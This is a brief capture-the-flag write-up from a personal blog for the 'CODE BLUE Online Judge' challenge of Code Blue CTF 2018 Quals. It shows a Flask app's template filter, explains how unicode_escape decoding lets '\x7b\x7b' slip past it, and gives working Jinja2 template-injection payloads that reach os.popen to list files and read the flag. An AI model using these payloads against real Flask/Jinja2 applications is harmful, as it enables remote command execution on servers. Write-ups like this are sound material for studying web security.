Code Blue CTF 2018 Quals - CODE BLUE Online Judge

2018-07-31

Code Blue CTF 2018 Quals

CODE BLUE Online Judge

Filtering

1
2
3

tags = ['{{', '{%', '{#']
for tag in tags:
    code = code.replace(tag, "{{ '%s' }}"%tag)

Vulnerability Analysis

def status_detail(uuid):
    submission = Submission.query.filter_by(uuid=uuid).first()
    if not submission:
        abort(404)
    code = render_template_string(
        decrypt(submission.code, session['key']
    ).decode('unicode_escape'), username=session['username'])
    return render_template('status_detail.html', submission=submission, code=code)

Filtering Bypass

1 2	>>> '\x7b\x7b'.decode('unicode_escape') u'{{'

get file list

\x7b\x7b ''.__class__.__mro__[2].__subclasses__()[59]()._module.__builtins__['__import__']('os').popen('ls -al').read() }}

read flag

\x7b\x7b ''.__class__.__mro__[2].__subclasses__()[59]()._module.__builtins__['__import__']('os').popen('cat flag1').read() }}

kimtruth's Blog

HackingWeb